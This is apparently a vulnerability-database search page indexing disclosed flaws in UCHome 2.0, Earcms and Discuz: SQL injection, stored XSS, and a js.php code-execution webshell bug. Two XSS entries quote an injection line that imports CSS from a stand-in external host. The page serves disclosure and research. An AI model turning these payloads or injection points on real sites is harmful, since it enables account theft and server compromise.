Lucene search
K

14 matches found

Gitee
Gitee
added 2020/03/07 8:41 a.m.3 views

poc

This is a collection of proof-of-concept PoC exploits for various vulnerabilities, primarily targeting web applications. The PoCs are written in Python and utilize the Beebeeto framework. Here's a summary of the PoCs: 1. Discuz x3.0 /static/image/common/focus.swf Cross Site Scripting XSS POC: Thi...

7.2AI score
Exploits0
CNVD
CNVD
added 2016/12/06 12:0 a.m.1 views

Earcms down.php suffers from arbitrary file download vulnerability

Ear Music Ear Music is an interface using Discuz backend style and UCHome user center style combined with the core by the high-speed template engine and caching mechanism and other frameworks coexist PHP open source music system. Earcms down.php arbitrary file download vulnerability. Allow...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/08/06 12:0 a.m.27 views

UCHOME 2.0 /source/cp_privacy.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/08/04 12:0 a.m.23 views

UCHome 2.0 /source/cp_profile.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/02/18 12:0 a.m.14 views

UChome存储型xss再来一发

简要描述: UChome 存储xss 再来一发 详细说明: 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/02/13 12:0 a.m.10 views

UChome的一枚存储型xss

简要描述: UChome 存储xss 详细说明: 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/11/26 12:0 a.m.21 views

UChome 注入漏洞2

简要描述: UChome 注入漏洞2 需要GPC=OFF和之前那个差不多 详细说明: cpblog.php ifsubmitcheck'blogsubmit' ifempty$blog'blogid' $blog = array; else if!checkperm'allowblog' ckspacelog; showmessage'noauthoritytoaddlog'; //验证码 ifcheckperm'seccode' && !ckseccode$POST'seccode' showmessage'incorrectcode';...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/11/25 12:0 a.m.53 views

UChome 注入漏洞

简要描述: UChome 注入漏洞 详细说明: source/cpclbum.php elseif$GET'op' == 'editpic' $managealbum = checkperm'managealbum'; includeonceSROOT.'./source/functionbbcode.php'; if$albumid 0 $query = $SGLOBAL'db'-query"SELECT FROM ".tname'album'." WHERE albumid='$albumid'"; if!$album = $SGLOBAL'db'-fetcharray$query...

7AI score
Exploits0
seebug.org
seebug.org
added 2013/05/27 12:0 a.m.16 views

UChome 2.0 MusicBox 插件 SQL注入漏洞

UChome是国内一款流行的内容管理系统软件,其v2.0版本MusicBox插件中存在SQL注入漏洞,攻击者可以利用该漏洞,执行恶意SQL语句。 UChome 2.0...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/08/19 12:0 a.m.11 views

UCHome 2.0 cp_theme.php 跨站脚本攻击漏洞

No description provided by source...

7.1AI score
Exploits0
myhack58
myhack58
added 2011/06/03 12:0 a.m.14 views

Uchome <=2.0 background GetWebShell exploit-vulnerability warning-the black bar safety net

Vulnerability description: uchome=2.0 of the program in js. php file there is a code execution vulnerability,the reason is a regular match when quotation marks used improperly,can lead to any Submission and execution of PHP code. In Php single quotes and double quotes there is a difference:...

7.6AI score
Exploits0
seebug.org
seebug.org
added 2010/09/03 12:0 a.m.16 views

uchome 2.0 存在持久XSS漏洞

看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件 uchome 2.0 临时解决方法: implode应该是import的笔误 /expression|vbscript|javascript|import/i 以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过. @import urlhttp://xxx.com/1.css; 包含远程css文件,可以在1.css中写入XSS利用. 分析代码 cptheme.php 92行17行调用 function checksecurity$str...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/07/31 12:0 a.m.22 views

uchome持久XSS(2.0版本测试通过)

简要描述: 看源码分析的,出错位置较敏感,而且基本没有利用限制 详细说明: 个人主页自定义风格时,可@import外部css文件 漏洞证明: 以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过. @import urlhttp://xxx.com/1.css; 包含远程css文件,可以在1.css中写入XSS利用. 分析代码 cptheme.php 92行17行调用 function checksecurity$str //执行一系列的过滤验证是否合法的CSS $filter = array '//\n\r.+?\n\r\//is', '/^a-z0-9+/i',...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/04/20 12:0 a.m.19 views

Uchome &lt;=2.0 后台GetWebShell漏洞

uchome=2.0的程序中js.php文件存在代码执行漏洞,原因是正则匹配时引号使用不当,导致可以任意提交并执行PHP代码。 Php中单引号与双引号是有区别的: " "双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。 ' '单引号里面的不进行解释,直接输出。 这里正则匹配后的2在双引号里,导致了代码可以执行。 Js.php 问题代码如下: include template"data/blocktpl/$id"; $obcontent = obgetcontents; obclean; $s = array"/r|n/",...

7.1AI score
Exploits0
Rows per page
Query Builder